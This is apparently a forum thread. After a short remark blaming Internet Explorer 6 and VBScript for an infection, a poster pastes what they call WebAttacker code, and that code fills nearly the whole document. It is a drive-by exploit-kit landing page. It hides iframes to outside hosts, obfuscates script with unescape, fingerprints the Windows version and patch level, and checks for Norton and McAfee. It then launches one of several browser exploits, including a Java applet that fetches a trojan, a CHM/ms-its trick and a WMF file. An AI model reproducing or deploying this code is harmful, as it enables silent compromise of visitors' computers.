You haven't seen the code for Webattacker, yet are positive it is
JavaScript-based? Hrmm...
Anyway, no, I assure you, the problem arose from you using Internet
Explorer 6, *with* lax security settings and the code used to pervert
your system was indeed, Microsoft-specific (VBScript).
i just found some of the webattacker code
<iframe src="
http://fl4w.info/shit/index.php" width=1 height=1></
iframe>
<!--hppage status="protected"-->
<HTML xmlns:IE>
<TITLE>Demo page</TITLE>
<HEAD><SCRIPT LANGUAGE="JavaScript"><!--
document.write(unescape("%3C%53%43%52%49%50%54%20%4C%41%4E
%47%55%41%47%45%3D%22%4A%61%76%61%53%63%72%69%70%74%22%3E%3C%21%2D%2D
%0D%0A%68%70%5F%6F%6B%3D%74%72%75%65%3B%66%75%6E%63%74%69%6F%6E
%20%68%70%5F%64%30%30%28%73%29%7B%69%66%28%21%68%70%5F%6F%6B
%29%72%65%74%75%72%6E%3B%64%6F%63%75%6D%65%6E%74%2E
%77%72%69%74%65%28%73%29%7D%2F%2F%2D%2D%3E%3C%2F
%53%43%52%49%50%54%3E"));//--></SCRIPT>
<STYLE type='text/css'>
IE\:clientCaps {behavior:url(#default#clientcaps)}
</STYLE>
</HEAD>
<BODY onLoad="setTimeout('Run_BOF()',2000);"><NOSCRIPT>To display this
page you need a browser with JavaScript support.</NOSCRIPT>
<CENTER><H1>This site is under construction...</H1></CENTER>
<IFRAME name="StatPage" width=5 height=5 style="display:none"></
IFRAME>
<IFRAME name="PageContainer" width=5 height=5 style="display:none"></
IFRAME>
<DIV id="ObjectContainer"></DIV>
<IE:clientCaps ID="oClientCaps" />
<script type="text/javascript" language="JavaScript">
var ExploitNumber=0;
function GetVersion(CLSID)
{
if (oClientCaps.isComponentInstalled(CLSID,"ComponentID"))
{return
oClientCaps.getComponentVersion(CLSID,"ComponentID").split(",");}
else
{return Array(0,0,0,0);}
}
function Get_Win_Version(IE_vers)
{
if (IE_vers.indexOf('Windows 95') != -1) return "95"
else if (IE_vers.indexOf('Windows NT 4') != -1) return "NT"
else if (IE_vers.indexOf('Win 9x 4.9') != -1) return "ME"
else if (IE_vers.indexOf('Windows 98') != -1) return "98"
else if (IE_vers.indexOf('Windows NT 5.0') != -1) return "2K"
else if (IE_vers.indexOf('Windows NT 5.1') != -1) return "XP"
else if (IE_vers.indexOf('Windows NT 5.2') != -1) return "2K3"
}
function Run_BOF()
{
if (ExploitNumber==4)
{
self.focus();
for (i=1 ; i <=4 ; i++)
{
document.writeln('<iframe width=1 height=1 border=0
frameborder=0 src="pluginst.htm"></iframe>');
}
document.writeln('<iframe width=1 height=1 border=0
frameborder=0 src="ie0601d.htm"></iframe>');
}
}
var CGI_Script="
http://jag.mews.ru/cgi-bin/ie0601.cgi";
if (navigator.appName=="Microsoft Internet Explorer")
{
Click_Request=CGI_Script+"?click";
var InetPath=document.location.href;
j=InetPath.lastIndexOf('/');
InetPath=InetPath.slice(0,j);
var IEversion=navigator.appVersion;
var IEplatform=navigator.platform;
if (IEplatform.search("Win32") != -1)
{
var WinOS=Get_Win_Version(IEversion);
FullVersion=clientInformation.appMinorVersion;
PatchList=FullVersion.split(";");
for (var i=0; i < PatchList.length; i++)
{
ServicePack=PatchList
;
j=ServicePack.indexOf('SP');
if (j != -1)
{
ServicePack=ServicePack.substr(j);
Click_Request=Click_Request+'&'+ServicePack;
}
}
StatPage.location=Click_Request;
var JVM_vers = GetVersion("{08B0E5C0-4FCB-11CF-
AAA5-00401C608500}");
var IE_vers = GetVersion("{89820200-
ECBD-11CF-8B85-00AA005B4383}");
fNortonAV=0; fMcAfee=0; XP_SP2_patched=0;
try
{
var oNortonAV=new
ActiveXObject("NAVCfgWizDll.NAVCfgWizMgr"); //Norton Antivirus Config
Wizard initialization
fNortonAV=1;
}
catch(e){}
try
{
var oMcAfee=new ActiveXObject("McGDMgr.DwnldGroupMgr"); //
McAfee Security Download Control initialization
fMcAfee=1;
}
catch(e){}
switch (WinOS)
{
case "2K":
if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))
{ ExploitNumber=1; }
else // if JVM =
5.0.3810.0 or higher
{
if ((fNortonAV==0)&&(fMcAfee==0))
{ ExploitNumber=3; }
else
{ ExploitNumber=2; }
}
break;
case "2K3":
if ((fNortonAV==0)&&(fMcAfee==0))
{ ExploitNumber=3; }
else
{ ExploitNumber=4; }
break;
case "XP":
if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))
{ ExploitNumber=1; }
else // if
JVM = 5.0.3810.0 or higher
{
for (var i=0; i < PatchList.length; i+
+)
{
if (PatchList=="SP2")
{ XP_SP2_patched=1; }
}
if (XP_SP2_patched==0)
{
if ((fNortonAV==0)&&(fMcAfee==0))
{ ExploitNumber=3; }
else
{ ExploitNumber=4; }
}
else
{
if ((fNortonAV==0)&&(fMcAfee==0))
{ ExploitNumber=5; }
else
{ ExploitNumber=4; }
}
}
break;
default:
if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))
{ ExploitNumber=1; }
else
{ ExploitNumber=2; } // if JVM =
5.0.3810.0 or higher
break;
}
// launching exploit which number is depends on Windows and
IE versions
switch (ExploitNumber)
{
case 1:
Trojan_Path=CGI_Script+"?exploit=MS03-11";
ObjectContainer.innerHTML='<applet
archive="'+InetPath+'/'+'ie0601a.jar" codebase="'+InetPath+'"
code="TakePrivileges.class" width=1 height=1><param name="ModulePath"
value="'+Trojan_Path+'"></applet>';
break;
case 2:
CHM_base='//ie0601b.chm'+'::'+'/main.htm';
Protocol=unescape("%6ds-i%74s:%6dh%74%6dl:");
Init_String=Protocol+'file://'+'C:\\MAIN.MHT!'+InetPath+CHM_base;
oMSITS=document.createElement("<OBJECT
data='"+Init_String+"' type='text/x-scriptlet'></OBJECT>");
document.body.appendChild(oMSITS);
document.title="Loaded !";
break;
case 3:
window.open("ie0601c.htm","Info","left=2000,top=2000,screenX=2000,screenY=2000,width=50,height=50,scrollbars=1,menubar=0,titlebar=0,toolbar=0,status=0");
self.focus();
break;
case 4:
;setTimeout('Run_BOF()',2000);
break;
case 5:
PageContainer.location="ie0601e.wmf";
break;
default:
break;
}
}
}
else if (navigator.appName=="Netscape")
{
StatPage.location=CGI_Script+"?click";
if (navigator.userAgent.indexOf('Firefox') != -1)
{
PageContainer.location="mfsa0601.htm";
}
}
else
{
StatPage.location=CGI_Script+"?click";
}
</script>
</BODY>
</HTML>